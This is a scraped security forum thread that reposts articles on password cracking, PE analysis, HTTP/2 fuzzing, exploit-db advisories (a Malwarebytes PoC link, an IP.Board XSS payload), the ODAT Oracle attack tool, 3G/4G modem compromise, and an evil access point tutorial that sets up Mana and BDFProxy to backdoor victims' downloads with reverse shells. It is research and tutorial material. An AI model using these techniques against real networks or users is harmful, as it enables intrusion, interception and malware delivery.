    Check out our GitHub Repository for the latest development version [h=3]GPU Driver requirements:[/h] NV users require ForceWare 346.59 or later AMD users require Catalyst 14.9 or later [h=2]Features[/h] Worlds fastest password cracker Worlds first and only GPGPU based rule engine Free Open-Source Multi-GPU (up to 128 gpus) Multi-Hash (up to 100 million hashes) Multi-OS (Linux & Windows native binaries) Multi-Platform (OpenCL & CUDA support) Multi-Algo (see below) Low resource utilization, you can still watch movies or play games while cracking Focuses highly iterated modern hashes Focuses dictionary based attacks Supports distributed cracking Supports pause / resume while cracking Supports sessions Supports restore Supports reading words from file Supports reading words from stdin Supports hex-salt Supports hex-charset Built-in benchmarking system Integrated thermal watchdog 150+ Algorithms implemented with performance in mind ... and much more [h=2]oclHashcat Screenshot[/h] [h=2]Attack-Modes[/h] Straight * Combination Brute-force Hybrid dict + mask Hybrid mask + dict * accept Rules Link: oclHashcat - advanced password recovery
  13. Nytro
    RogueKillerPE Description RogueKillerPE is a PE parsing tool, able to show internal structure of executable files. It’s able to read either the memory image (process module) or the disk image (filesystem) of a given executable. [TABLE] [TR] [TD] RogueKillerPE 32 bits Download 14 Mb [/TD] [TD] RogueKillerPE 64 bits Download 14 MB [/TD] [/TR] [/TABLE] Features: Open PE from file, and read disk image. Open PE from process, and read memory or disk image. Open file from command line. Drag and drop support. Process general information (pid, parent, …) File general information (attributes, size, …) Process module general information (address, size, …) A bunch of hashes (MD5, SHA1, SHA256, …) Process memory pages, with ability to dump. Injected pages detection, non-readable pages detection. Ability to dump injected pages to file. Hex code, with ability to search (hex values, or string ANSI/UNICODE). Assembly code, with ability to navigate. PE Headers (MZ, PE, Optional, …) RunPE detection, shows which header fields are modified. Checksum validation. PE Sections, with ability to watch hex code and dump to file. PE Imports, with ability to watch APIs assembly code (memory only). PE Exports, with ability to watch APIs assembly code. Hooks detection in imports/exports (table and inline hooks). PE Resources. Able to parse all well known types and display them accordingly (strings, version information, icons, …) Executable files detection in resources. Ability to watch hex code of resources. Ability to dump resources to file. PDB path detection. Strings scanner, with classification (Registry, files, …) Ability to dump all strings (by category or not) to file. User guide Start the tool. Drag a file on the interface, or load the process list. If you choose a file, there you go. If you choose a process, you can inspect a different module by selecting a new one in the modules list. If you choose a process, you can toggle disk/image and switch from process memory to disk image and vice-versa. Sursa: RogueKillerPE download
  14. Nytro
    Attacking HTTP/2 Implementations Introduction Yahoo Pentest Team members Stuart Larsen (@xc0nradx) and John Villamil (@day6reak) presented original research at Pacsec 2015 on the HTTP/2 protocol, its security implications, and flaws discovered in a number of implementations. Through this presentation, summarized below, we hope to make the protocol a more popular research target. What follows is a summary of our presentation given at Pacsec 2015 (slides). HTTP/2 is a new technology that is already seeing widespread use across the Internet. There has been little security research into this new protocol yet multiple implementations and widespread adoptions already exist. HTTP/2 lives in browsers, caching proxies, and libraries. It is the undisputed future of Internet connections and vulnerabilities in this protocol have the potential to cripple infrastructure. Our talk focused on threats, attack vectors, and vulnerabilities found during the course of our research. Two Firefox, two Apache Traffic Server (ATS), and four Node-http2 vulnerabilities will be discussed alongside the release of the first public HTTP/2 fuzzer. We showed how these bugs were found, their root cause, why they occur, and how to trigger them. We will also discuss http2fuzz, a fuzzer for both client and server endpoints of HTTP/2 connections. The fuzzer is open source and written in Go. It implements a large part of the HTTP/2 protocol and supports various frame types. It also includes a unique replay mechanism to help track down crash causing packets. We had previously blogged about two ATS bugs found by an earlier version of this fuzzer. Overview HTTP/1.1 came out back in 1999 and it was a huge step in bringing the web forward. But since then, websites have grown drastically, and HTTP had to be revisited. Today’s sites are much more complex with many more interconnected dependencies. ISP speeds have improved and more bandwidth is available. The changes from HTTP/1.1 to HTTP/2 are all about performance. The major changes are: - Binary Protocol / Compression - Multiplexing - Server Push - Frames But these new changes in functionality and complexity also introduce additional attack surface to HTTP implementations. HPACK Originally, HTTP was stateless. It followed a very simple model to make a request and receive a response. But that also means lots of redundant information is sent. HPACK (RFC7541) was released to address these and other issues. HPACK is a binary header compression protocol. It uses dynamic lookup tables to store and retrieve headers. Headers only need to be sent once, and are remembered for future requests on the same connection. This differential encoding saves space and time and is a huge improvement over the vanilla protocol. Frames Frames are the fundamental unit of communication within HTTP/2. Here is a typical HTTP/2 header visualized: There are 10 different types of frames: - Headers - Data - Priority - Reset - Settings - Push - Ping - Goaway - Update - Continuation To learn more about individual frames, checkout the RFC. Push Promise Push Promise is a new feature of HTTP/2 that allows you to push resources to a client before the client requests them. For example if a client requests /index.html, the server can probably assume the client will also want /logo.png. New Attack Surface - HPACK - Upgrades / Downgrades - Inconsistent Multiplexing - Malformed Frames - Pushing arbitrary data to client - Pushing arbitrary data to server - Stream dependencies - Invalid Frame States With all of this new attack surface we needed an automated way of getting good code coverage in HTTP2 implementations. For this we decided to build a new fuzzer. http2fuzz http2fuzz is a fuzzer written in golang for fuzzing HTTP/2 implementations in either server or client mode. It has a variety of strategies for both smart and dumb fuzzing. It can either rebuild valid frame structures with invalid data, or use completely random data. A big challenge in fuzzing is determining what payload actually caused the target to crash. We decided to build a replay feature that saves each frame that is sent. If a crash occurs, the replay list can be inspected and minimized to determine which payload was the cause of the crash. Bugs 1,2: Apache Traffic Server Our fuzzer discovered two remotely exploitable vulnerabilities in Apache Traffic Server. Both of these had the potential for arbitrary code execution. These bugs were covered in a previous blog post. Bug 3: Firefox HTTP/2 Malformed Header Frame DoS Normally a header frame consists of a pad length, stream dependency identifier, weight, block header fragment, and padding. If only a single byte is sent an integer underflow occurs which causes nsCString to try to allocate nearly 2^32 bytes of memory. HTTP2Session.cpp:1226 [1226]: self->mDecompressBuffer.Append(self->mInputFrameBuffer + kFrameHeaderBytes + paddingControlBytes + promiseLen , self->mInputFrameDataSize - paddingControlBytes - promiseLen - paddingLength); [1226]: self->mDecompressBuffer.Append(ptr + uint8_t(9) + uint8_t(0) + uint16_t(0) , uint32_t(1) - uint8_t(8) - uint32_t(5) - uint16_t(0)); As shown above, an underflow is caused in the second parameter of the buffer decompress. These issues were addressed by the Firefox developers. Bug 4: Firefox HTTP/2 Malformed Push Promise DoS This bug is very similar to the previous bug except it occurs inside push promise. HTTP2Session.cpp:1634 [1634]: self->mDecompressBuffer.Append(self->mInputFrameBuffer + kFrameHeaderBytes + paddingControlBytes + promiseLen , self->mInputFrameDataSize - paddingControlBytes - promiseLen - paddingLength); [1634]: self->mDecompressBuffer.Append(ptr + uint8_t(9) + uint8_t(1) + uint16_t(4) , uint32_t(76) - uint8_t(1) - uint32_t(4) - uint16_t(75)); Bugs 5-8: node-http2 We found a number of bugs inside node-http2 through fuzzing. Most of them involve buffer out of bound reads or invalid state handling within Javascript. These issues do not appear exploitable for arbitrary code execution but could be used to perform denial of service attacks against Node based web servers that use the package. https://github.com/molnarg/node-http2/issues/145 https://github.com/molnarg/node-http2/issues/146 https://github.com/molnarg/node-http2/issues/147 https://github.com/molnarg/node-http2/issues/148 [*] These issues have not been addressed by the project maintainers. The package no longer appears to be in active development. Conclusion HTTP/2 brings with it a lot of new attack surface. More research needs to be conducted on the implications of this protocol on web security. New tools need to be developed which handle the protocol and allow penetration testers to effectively audit HTTP/2 based web sites. Security products, including NIDS, will need to implement a subset of the protocol to effectively audit connections for malicious behavior or exploits. Lastly, more testing needs to be done on implementations of the protocol before they are enabled for popular use. Stuart Larsen and John Villamil of the Yahoo Pentest Team Sursa: http://yahoo-security.tumblr.com/post/134549767190/attacking-http2-implementations
  15. Nytro
    An Introduction to Image File Execution Options December 4, 2015 | BY Pieter Arntz Image File Execution Options (IFEO) are used for debugging. Malware, however, does not only check if there are debuggers active, but it’s also known to use the features IFEO has to offer to their own advantage. Intention IFEO settings are stored in the Windows registry. The intention of creating the IFEO registry key is to give developers the option to debug their software. This is relatively easy to do. Developers can attach any program to any executable using the registry key— HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\{name of the executable} —and adding the value “Debugger”=”{full path to the debugger}” For example, if you use Process Explorer, there is an option to “Replace Task Manager”: Articol complet: https://blog.malwarebytes.org/development/2015/12/an-introduction-to-image-file-execution-options/
  16. Nytro
    DEF CON 23 Conference - Runa Sandvik, Michael Auger - Hacking a Linux-Powered Rifle TrackingPoint is an Austin startup known for making precision-guided firearms. These firearms ship with a tightly integrated system coupling a rifle, an ARM-powered scope running a modified version of Linux, and a linked trigger mechanism. The scope can follow targets, calculate ballistics and drastically increase its user's first shot accuracy. The scope can also record video and audio, as well as stream video to other devices using its own wireless network and mobile applications. In this talk, we will demonstrate how the TrackingPoint long range tactical rifle works. We will discuss how we reverse engineered the scope, the firmware, and three of TrackingPoint's mobile applications. We will discuss different use cases and attack surfaces. We will also discuss the security and privacy implications of network-connected firearms. Speaker Bios: Runa A. Sandvik is a privacy and security researcher, working at the intersection of technology, law and policy. She is a technical advisor to both the Freedom of the Press Foundation and the TrueCrypt Audit Project, and a member of the review board for Black Hat Europe. Twitter: @runasand Michael Auger is an experienced IT Security specialist with extensive experience in integrating and leveraging IT security tools. He has leveraged a wide range of IT security solutions, integrating them, to deliver leading edge incident response and security operations capabilities.
  17. Nytro
    PHP 7.0 arrives, so go forth and upgrade if you dare ou get to play with a T_SPACESHIP operator, and much, much, more 3 Dec 2015 at 08:34, Jack Skinner PHP 7.0 was launched today, so we've asked @Sydphp organiser and #phunconf convener Jack Skinner to explain its significance. Over to you, Jack ... PHP is the language we love to hate and often hate to love. After celebrating it’s 20th birthday earlier this year, it's clearly here to stay, not least because version 7 arrived today. From humble beginnings as a dangerous thought from Rasmus, PHP has grown to a monolith by software standards; depending on which benchmark you believe, it drives up to 81 per cent of the web. The latest release has arguably taken the internals team eight years to complete, although many of the original features were rolled into existing stable releases. As work on unicode started to fray at the edges, the team decided to push core languages features into version 5.3, 5.4, and 5.5. The latest rendition of the 5 series will be around for another two years before being officially deprecated and off the security maintenance list. Because deprecating old versions has worked so far in the past (looks at Windows XP). Today's release was kickstarted again in late 2013 with the new internal engine dubbed ‘next gen’ or, for the less hipster among us, ‘phpng’. ng brought the engine almost up to par with competitor interpreters like hhvm from Facebook (which of course has out performed PHP core for many years). A years effort in 2014 more than doubled CPU and memory optimisation in the core engine and was eventually merged into core. Depending on which benchmarks you make yourself, PHP7 halves (or better) both memory and CPU instructions from the latest 5.6 releases. Even as pure marketing spiel, that's an impressive benchmark for a major language release. So version 6 was sent off to the glue factory, PHP 5 got the shiny new features and thus PHP7 got shiny new hotrod wheels and a confusing release number. It’s fast, so what? It's not just the new hot wheels look to the language that has web devs excited. PHP 7 also ships with a circus full of new features. For example, after 20 years the language is finally getting an internal Abstract Syntax Tree for static analysis. Something Java has had for, oh, about a decade. It’s also worth noting that with fond memories of PHP Sadness in our hearts there's also a much improved and more consistent variable syntax! Of course uniform variable syntax (as its known to the devs) breaks everything and naturally that’s PHP’s version of consistent, since the age old argument between array and string function arguments remains con...unchanged (what… did you expect a pun?) With so much changed, PHP 7 is almost certainly not backwards compatible with your existing code, especially if you’re running anything remotely legacy (yes, even you there with the ‘updated PHP 4 project). With many operators and corner cases being broken fixed, a long laborious task awaits any project unwilling or unable to provide decent test coverage. So much so that we’re predicting soapboxes will be in short supply as geeks announce their test suite coverage to the world in an attempt to upgrade. Finally a language that speaks my language! A lot of the debate that killed PHP v6 was the implementation of full, native unicode support and after so many years being unable to say hello world in emoji who can blame the team for wanting to update. It’s almost a non-issue now that PHP 7 can not only have the pile-of-poop emoji as a variable name, but also reliably use it as a string internally. A whole new release just for emoji fun! Since programmers are lazy there’s also a raft of new syntax additions, mostly around shortening of certain statements. In fact with new ?? ?: and <=> operators and shortened namespace syntax we’re wondering if PHP is slowly becoming the brainf*ck of the web. PHP 8 maybe? Shooting for the stars Releasing a new version should be easy right? Especially with the new perl-inspired (or for the script-hipsters among us, ruby inspired) T_SPACESHIP operator (no really, thats what PHP 7 calls <=> internally!). Quite a few projects, however, have been proactive over the last year; almost all the major frameworks and CMSs are claiming full compatibility with the new version at or close to launch. WordPress, for example, officially aims to have PHP 7 compatibility on or soon after release day, whereas Drupal has steamrolled straight ahead with the Drupal 8 launch last week and included PHP 7 out of the box. Unfortunately, here’s still no word from Joomla; they’re probably still recovering form last month’s global summit after-party. On the framework front, Zend Framework and Symfony have both announced their respective PHP 7 support, but naturally enterprise release cycles will slow down any adoption. At least the core projects maintain support. As with everything, your dependencies might take a while. #upgradecycledrama Go forth and upgrade! One would think after 20 years the team would have practice, but the internals team recently spent a few days playing “that's not a bug, THIS is a bug” and debating release day just a little longer. According to bug reports the count() function couldn’t count, which is fine if you're not planning to release it into the wild! Don’t worry, internals finally stopped throwing sand across the playground and agreed on an eighth release candidate before release. It's fixed now (I'm told). Upgrade to PHP7 on launch day? I, too, like to live dangerously! But with PHP 7 and its shiny new feature list coming to a repository near you, it’s safe to say PHP isn’t going the way of the dinosaur just yet. ® Sursa: http://www.theregister.co.uk/2015/12/03/php_70_arrives_complete_with_ttt_spaceshiptt_operator/
  18. Nytro
    [h=1]Malwarebytes Antivirus 2.2.0 - DoS PoC[/h] ##################################################################################### Application: Malwarebytes Antivirus Platforms: Windows Versions: 2.2.0. CVE: No CVE have been assigned Author: Francis Provencher of COSIG Twitter: @cosiG_ ##################################################################################### 1) Introduction 2) Report Timeline 3) Technical details 4) POC ##################################################################################### =============== 1) Introduction =============== Malwarebytes Anti-Malware (MBAM) is an application for computers running under the Microsoft Windows and Apple OS Xoperating system that finds and removes malware.[3] Made by Malwarebytes Corporation, it was first released in January 2008. It is available in a free version, which scans for and removes malware when started manually, and a paid version, which additionally provides scheduled scans, real-time protection and a flash memory scanner. ([url]http://www.oracle.com/us/technologies/embedded/025613.htm[/url]) ##################################################################################### ============================ 2) Report Timeline ============================ 2015-11-28: Francis Provencher of COSIG found the issue; 2015-11-30: Francis Provencher of COSIG report vulnerability to Malwarebytes; 2015-12-02: Malwarebytes release a patch for this issue; ##################################################################################### ============================ 3) Technical details ============================ When a malformed executable with an invalid integer (-1) in the “SizeOfRawData” in UPX section is parsed by Malwarebytes, a memory corruption occured. Successful exploitation of the vulnerabilities may allow execution of arbitrary code. ##################################################################################### =========== 4) POC [url]https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38858.exe[/url] Sursa: https://www.exploit-db.com/exploits/38858/
  19. Nytro
    [h=1]IP.Board 4.1.4.x - Persistent XSS Vulnerability[/h] # Exploit Title: IP.Board Persistent XSS Vulnerability # Date: 29/10/2015 # Software Link: https://www.invisionpower.com/buy # Software version : 4.1.4.x # Exploit Author: Mehdi Alouache # Contact: mehdi.alouache@etu.univ-lehavre.fr # Category: webapps 1. Description Any registered user can execute remote javascript code by sending a private message to another user. The malicious JS code has to be written in the title of the message, and the receiver must have enabled the notifications when a new message is delivered. Note that the code will be directly executed as soon as the notification appear. (The receiver doesn't even need to check his inbox). 2. Proof of Concept Register on the forum (IP.Board) of a website as a regular user, and send a message to any user having the message notifications enabled. In the title field (and only here), a simple <script>alert(1)</script> will show a dialog box to the victim. 3. Solution: Patch the vulnerability with the (incoming) associated patch. -- ALOUACHE Mehdi Departement informatique Groupe A mehdi.alouache@hotmail.fr mehdi.alouache@etu.univ-lehavre.fr Sursa: https://www.exploit-db.com/exploits/38837/
  20. Nytro
    Nu. Daca ai acces de user obisnuit (limitat) pe un Windows si acest program e instalat, te poti folosi de el ca sa obtii privilegii de administrator. Ca sa iti protejezi site-ul e cam greu (imposibil). Poti verifica User-Agent-ul si diferite headere HTTP pe care le trimite, insa probabil se pot scoate sau modifica. Poti sa blochezi dupa un anumit numar de request-uri pe secunda dar se poate scana mai "lent". Poti sa blochezi IP-ul (de pe care se scaneaza) dupa un numar mare de erori (gen 404) dar se pot evita. Pe scurt, e mai simplu sa ai un site "sigur", decat sa te ascunzi de scannere web.
  21. Nytro
    http://www.cis.syr.edu/~wedu/Teaching/cis643/LectureNotes_New/Format_String.pdf https://crypto.stanford.edu/cs155/papers/formatstring-1.2.pdf
  22. Nytro
    Oracle Database Attacking Tool ODAT linux standalone version at https://github.com/quentinhardy/odat-standalones ODAT ODAT (Oracle Database Attacking Tool) is an open source penetration testing tool that tests the security of Oracle Databases remotely. Usage examples of ODAT: You have an Oracle database listening remotely and want to find valid SIDs and credentials in order to connect to the database You have a valid Oracle account on a database and want to escalate your privileges (ex: SYSDBA) You have a valid Oracle account and want to execute commands on the operating system hosting this DB (ex: reverse shell) Tested on Oracle Database 10g, 11g and 12c(12.1.0.2.0). Features Thanks to ODAT, you can: search valid SID on a remote Oracle Database listener via: a dictionary attack a brute force attack ALIAS of the listener [*]search Oracle accounts using: a dictionary attack each Oracle user like the password (need an account before to use this attack) [*]execute system commands on the database server using: DBMS_SCHEDULER JAVA external tables oradbg [*]download files stored on the database server using: UTL_FILE external tables CTXSYS DBMS_LOB (NEW : 2014/07/28) [*]upload files on the database server using: UTL_FILE DBMS_XSLPROCESSOR DBMS_ADVISOR [*]delete files using: UTL_FILE [*]send/reveive HTTP requests from the database server using: UTL_HTTP HttpUriType [*]scan ports of the local server or a remote server using: UTL_HTTP HttpUriType UTL_TCP [*]capture a SMB authentication through: an index in order trigger a SMB connection [*]exploit the CVE-2012-313 (CVE-2012-3137 : The authentication protocol in Oracle Database Server 10.2.0.3, 10.2.0.4, 10.2.0.5, 11.1.0.7, 11.2.0.2, and 11.2.0.3 all) pickup the session key and salt for arbitrary users attack by dictionary on sessions [*]check CVE-2012-1675 (http://seclists.org/fulldisclosure/2012/Apr/204) [*]search in column names thanks to the search module: (NEW : 2015/03/17) search a pattern (ex: password) in column names [*]unwrap PL/SQL source code (10g/11g and 12c) Sursa: https://github.com/quentinhardy/odat
  23. Nytro
    Critical Vulnerabilities in 3G/4G Modems or how to build Big Brother This report is the continuation of "#root via SMS", a research made by the SCADA Strangelove team in 2014. It was devoted to telecommunications equipment vulnerabilities with modem flaws only partially covered. This document describes vulnerabilities found and exploited in eight popular 3G and 4G modems available in Russia and worldwide. The findings include Remote Code Execution (RCE) in web scripts, integrity attacks, Cross-Site Request Forgery (CSRF), and Cross-Site Scripting (XSS). The research covers a full range of attacks against carrier customers using these types of modems — device identification, code injection, PC infection, SIM card cloning, data interception, determining subscriber location, getting access to user accounts on the operator's website, and APT attacks. Equipment We analyzed eight modems of the following vendors: Huawei (two different modems and a router) Gemtek (a modem and a router) Quanta (two modems) ZTE (one modem) Not all the modems had vulnerabilities in their factory settings; some of them appeared after the firmware was customized by the service provider. For convenience, let's call all the network equipment — both modems and routers — collectively, "modems". Statistics on Vulnerable Modems The data was gathered passively from SecurityLab.ru between 01/29/2015 and 02/05/2015 (one week). Our statistics lacks information about Huawei modems, but it can be easily found at shodan.io: Vulnerabilities Detected All the modem models investigated had critical vulnerabilities leading to complete system compromise. Virtually all the vulnerabilities could be exploited remotely (see the "Modems" table). Description of the detected vulnerabilities ranked by severity: 1. RCE (five devices) All the modem web servers are based on simple CGI scripts that are not properly filtrated (except for Huawei modems, and even then only after a few security updates since the vulnerabilities have been disclosed). All the modems work with the file system — they need to send AT commands, read and write SMS messages, configure firewall rules, etc. Almost no devices had CSRF protection, which allowed remote code execution by power of social engineering and remote requests through a malicious website. Some modems were also vulnerable to XSS attacks. Combined, these three factors produce a disappointing result — more than 60% of the modems are vulnerable to Remote Code Execution. You could get an updated firmware without all found vulns for only Huawei modems (there's a public description of the vulnerabilities). The other vulnerabilities are still considered to be zero-day. 2. Integrity Attacks (six devices) Only three modems were protected against arbitrary firmware modifications. Two of them had the same integrity check algorithms (asymmetrically encrypted SHA1 with RSA digital signature), and the third one used the RC4 stream cipher for firmware encryption. All the cryptographic algorithms proved to be vulnerable to attacks violating integrity and confidentiality. In the former case, we can modify the firmware by injecting an arbitrary code. In the latter case, given the weak implementation of the algorithm, we managed to extract the encryption key and determine the encryption algorithm, which also allows firmware modification. The other three modems had no protection from integrity attacks, but a local access to COM interfaces was required to update the firmware. The remaining two modems could be updated only though the carrier's network via Firmware Over-The-Air (FOTA) technology. 3. CSRF (five devices) CSRF attacks can be used for various purposes, but the primary ones are remote upload of modified firmware and successful arbitrary code injection. Using unique tokens for each request is an efficient protection against this type of attacks. 4. XSS (four devices) The scope of this attack is quite wide — from host infection to SMS interception. However, our research focuses mainly on its prime target — modified firmware upload bypassing AntiCSRF checks and the Same-Origin Policy. Attack Vectors 1. Identification First, you need to identify a modem for a successful attack. You can send all kinds of requests to exploit RCE or try to upload various updates via all the possible addresses, but it seems to be inefficient and too signally for a target user. The time of infection — from user detection to code injection, modification of modem settings, etc. — is also quite important in the real (not simulated) conditions. For this very reason, you need to identify the target device properly. To do that, you must use a simple set of picture addresses, which can tell you the model of the modem. This method helped us to identify all the investigated modems 100%. An example of the code: 2. Code Injection This stage is described in the previous section, points 1 and 2. The code can be injected either though RCE in web scripts, or though uploading infected firmware. The first method allowed us to penetrate five modems, it isn't that complicated. Let's describe the vectors of the second method in detail. Two modems used the same algorithm to protect firmware integrity: the digital signature of SHA1 hash sum by an asymmetric RSA key was carried out via an OpenSSL library. The verification was incorrect: after uploading the firmware (an archive), the web server extracted two main files from it — the one specifying the size of the verified data and the one with the signed hash sum. Next, the verification script obtained a public key from the file system and sent a request to OpenSSL functions to decrypt signature and compare hashsum. If hashsums were the same, the update was installed. The firmware compression algorithm had a feature — you could add additional files with the same names to the archive, but its first bytes wouldn't change. In addition, when we extracted the firmware, the later files overrode the earlier files. This allows changing the firmware without affecting data integrity checks. The firmware of the third modem was encrypted by the RC4 algorithm with a constant keystream. As there were three different firmware versions on the Internet, you could get several bytes of plain text where there were bytes 0x00 in a file of the unencrypted firmware. Then, we extracted the ISO image of the modem's virtual CDROM, which allowed us to decipher the first several kilobytes of the each firmware image. They contained the encryption algorithm and address of the encryption key. By XORing the two pieces of firmware, we obtained the plain text of the key itself. Dmitry Sklyarov, an experienced cryptanalyst and reverse engineer from Positive Technologies, helped us a lot to conduct attacks against cryptographic protocols. You can use CSRF for remote upload and HTML5 functions for transferring multipart/form-data, or XSS if an application is protected against CSRF (Huawei modem). Only three Huawei modems had this kind of protection, which could be bypassed via XSS, though. In all other cases, an attacker could use the HTML5 code located on a special web page (you can download an example fromhttp://blog.kotowicz.net/2011/04/how-to-upload-arbitrary-file-contents.html). Gemtek modems required a special utility for firmware updates installed on PC. In this case, firmware was uploaded though host internet connection via HTTP. After that, the firmware integrity was verified by checksums uploaded from the server. We failed to test this scenario. However, it’s no use hoping that a vendor that doesn't properly check firmware integrity during upload protects it well enough. 3. Data Interception Now we can execute an arbitrary code on the modem. You need to do three things: determine the modem’s location (later you will understand why) plus be able to intercept SMS messages and HTTP/HTTPS traffic. The easiest way to determine location is to find the base station identifier (CellID). Then, with the operator’s MCC and MNC at hand, you can determine the victim’s exact location by means of some public bases, such as opencellid.org. Another method is to use the modem’s Wi-Fi card to scan nearby networks and determine the victim’s location area more accurately, given that one base station may have quite a broad coverage. We managed to obtain the CellID of six modems; Wi-Fi was available in two devices. We had to recompile and upload new network card drivers for one of the modems. Its previous driver allowed only the Ad Hoc mode, which prevents scanning nearby APs. We studied two types of modems: with and without SMS support. The first type also didn’t allow SMS reading though AT commands. The second type allowed SMS reading via XSS. The messages are usually stored in the file system, and it’s not so difficult to get access to them for reading or sending SMS messages and USSD requests. Traffic interception is more interesting. There are several ways to do that: by changing the modem’s DNS server settings, or replacing the modem’s gateway with the Wi-Fi interface and connecting to an hacker’s access point (that’s why you should know the victim’s location). The first method is simpler: changing the settings is a piece of cake, as they are also stored in the file system. We managed to do that for all but one modem. We studied the second method only in theory — switching the network card mode from ad hoc to active, connecting to an access point, and changing modem routing. Not only HTTP traffic can be intercepted. By injecting and executing a VBS code on an HTML page, you can add your certificate to the Trusted Root Certification Authorities and successfully conduct MITM attacks: 4. SIM Card Cloning and 2G Traffic Interception The attacks against SIM card applications were described in detail by Karsten Nohl and in the “#root via SMS” research. We still have to send binary SMS messages to SIM cards, as we failed to make modems send commands to SIM card applications via APDU. It’s not that bad, though — by injecting an arbitrary code to a modem, you can extend the attack scope by means of binary SMS messages. Firstly, you can now send these messages “to yourself” from the target SIM card via the AT interface by switching the modem to the test mode and working with the COM port. You can do that in the background —the web interface will be available to the victim, who will hardly notice mode changeover. Secondly, you need to exchange data with the COM port via injecting a VBS code to the modem page and executing it with user rights with the help of social engineering. Switching the modem to the test mode The PowerShell script for sending a binary SMS message Using FakeBTS is the next attack vector, and you also need to know the victim’s location for it. Having the victim’s exact location and IMSI at hand, we can use a fake base station nearby and wait until the subscriber connects to us, or we can force a base station (it is possible for five devices). If the operation is successful, we will be able to send binary SMS messages to the target SIM card without any restrictions from the operator. 5. PC Infection If we penetrate a modem, we have very few attack vectors. However, infecting a PC connected to the modem provides us with many ways to steal and intercept the PC user's data. You may have already heard of the main infection vector — bad USB. There are also some other methods involving social engineering: Virtual CDROM. Almost all the modems have a virtual drive image that is enabled for driver installation. You need to replace the image and force its mounting. VBS, drive-by-download. Code injection to an HTML page, or forced upload of executable files as updates or “diag utilities”. Browser 0-days. As an example, we used Adobe Flash 0-day found in the archives of Hacking Team. Vulnerable client software. One of the operators delivered vulnerable diagnostic software together with its modems, which allowed executing an arbitrary code on Windows and OS X PCs. Reference: we'd like to give a special thanks to Mikhail Firstov from Headlight Security for detecting this vulnerability. Random Code Execution in the client software of a modem 6. APT Attacks After infecting the modem and host, you need to stay in the systems somehow — save changes in the modem's even after it is switched off and prevent further firmware updates. It would be useful to detect and infect other vulnerable modems as soon as they will be connected to the PC. Most of the devices can be infected right at the phone store during "checking before buying". There was another attack we failed to conduct — accessing the modem from the operator's network. Most vulnerable web servers listen at *:80, i.e. there's a chance that the modem's web server will be available from the operator's network. Only a few modems restrict connections incoming from the telecom's network or specify the address for listen 192.168.0.1:80. 7. Additional Information We also studied getting access to a personal account by sending a USSD request and resetting password via an SMS message. This vector was demonstrated during the "#root via SMS" presentation. The vulnerability was exploited through an XSS attack that could be conducted by sending an SMS message. However, an attacker can also do that in modems that allow SMS reading via RCE. XSS exploitation results Summary All in all, we have a full infection cycle of devices and related PCs. Using the infected devices, we can determine location, intercept and send SMS messages and USSD requests, read HTTP and HTTPS traffic (by replacing SSL certificates), attack SIM cards via binary SMS messages, and intercept 2G traffic. Further infection can continue through the operator's networks, popular websites or equipment infected by worms (when connecting a new device). What can we recommend to those clients who constantly work with such devices? Huawei modems with the latest firmware updates are the most protected. It is the only company that delivers firmware (the operators are only allowed to add some visual elements and enable/disable certain functions) and fixes vulnerabilities detected in its software. ? Modems Information Disclosure Although 90 days had left since the service providers were informed of the vulnerabilities, many flaws remained unfixed. Credits: Alexey Osipov, Dmitry Sklyarov, Kirill Nesterov, Mikhail Firstov, and the SCADA Strangelove team (http://scadasl.org) Author: Positive Research ?? 6:10 AM Sursa: http://blog.ptsecurity.com/2015/12/critical-vulnerabilities-in-3g4g-modems.html
      • 1
      • Upvote
  24. Nytro
    EVIL ACCESS POINT WITH AUTO-BACKDOORING FTW! This post is about setting up an evil access point that will automatically backdoor executables that connected users download. Pretty neat, right? This tutorial is inspired by muts' NetHunter video of BDFProxy on NetHunter. I am using Kali NetHunter 2.0 running from a Nexus 9. I am using a TP-LINK TLWN722N (the 150Mbps version) as my secondary network interface. I recently purchased a Nexus 9 tablet and decided to load it up with Kali NetHunter. NetHunter is a release of Kali made specifically for hackers on-the-go. It’s packed with lots of cool stuff like one-click scripts, HID Keyboard attack capabilities plus a bunch of the tools that Kali desktop comes with. Tools A few tools I will be using: Mana – Rouge Access Point toolkit. It implements a more advanced version of the Karma attack. The most notable improvement is Mana responds to other AP broadcasts instead of device probes like Karma, but still with the end goal of tricking victims into connecting to the AP you own. Plus, it includes lots of other neat evil AP tricks that are baked right in. For more info on Mana I’d recommend watching the Defcon 22 talk where the tool was release here. BackdoorFactory BDFProxy – Automatically patches binaries with malicious payloads on the fly via MITM. False Start Since I want to also provide victims with Internet access so I can backdoor their downloads I will need another Wi-Fi interface on my Nexus 9. I ended up going with the TP-LINK TLWN722N because of its low power usage and its compatibility with Kali (supports packet injection). I launched the Kali NetHunter menu and saw a promising looking menu item: Kali NetHunter comes with Mana already installed and ready to go, or so I thought. Chances are I was doing something wrong, but I was not able to get the built-in one click launcher working out of the box. It even contained a screen for bdfproxy.cfg! When I started it there was even the option to start with bdf: But no dice. Even after correcting my upstream device from eth0 to wlan1 and double checking the dhcpd settings in the config file I couldn’t get the thing to run. I couldn't seem to find the output of either Mana or BDFProxy in the logs either. Setting Up So, off to the terminal! Home sweet home. I went into the Mana folder and skulked around a little bit: cd /usr/share/mana-toolkit/run-mana ls –lah Aha! The start-nat-simple-bdf-lollipop.sh looks promising. Let’s have a look: Everything looks pretty straightforward actually, which was pleasantly surprising. I never know what to expect with new tools. We assign some variables for devices, enable forwarding, start an access point and DHCP, monkey with the iptables and off we go. The only thing that stumped me at first was the “# Add fking rule to table 1006”. There are some config files mentioned in there. Let’s make sure they are set up properly. First stop is /etc/mana-toolkit/hostapd-karma.confg: Next let’s look at /etc/mana-toolkit/dhcpd.conf: Looks like we’re using Google for DNS and putting our clients on the 10.0.0.0/24 range. Cool beans. Let’s also take a look at the BDFProxy config file at /etc/bdfproxy/bdfproxy.cfg (config file below truncated to the important parts): Looks like there is something slightly off here. The IPs configured for our reverse shells (192.168.1.168 and 192.168.1.16) need to point back to us. According to our dhcpd.conf settings we're going to use the current settings aren't correct. We will be the router IP named in dhcpd.conf, so we need to change bdfproxy.cfg accordingly by setting all the HOSTs to point to us at 10.0.0.1. Quick replace with sed: sed –i 's/192.168.1.168/10.0.0.1/g' bdfproxy.cfg sed –I 's/192.168.1.16/10.0.0.1/g' bdfproxy.cfg The diffs: Starting up the Machine Ok, so it’s time to start Mana up: cd /usr/share/mana-toolkit/run-mana ./start-nat-simple-bdf-lollipop.sh In a new terminal we start BDFProxy up: cd /etc/bdfproxy/ 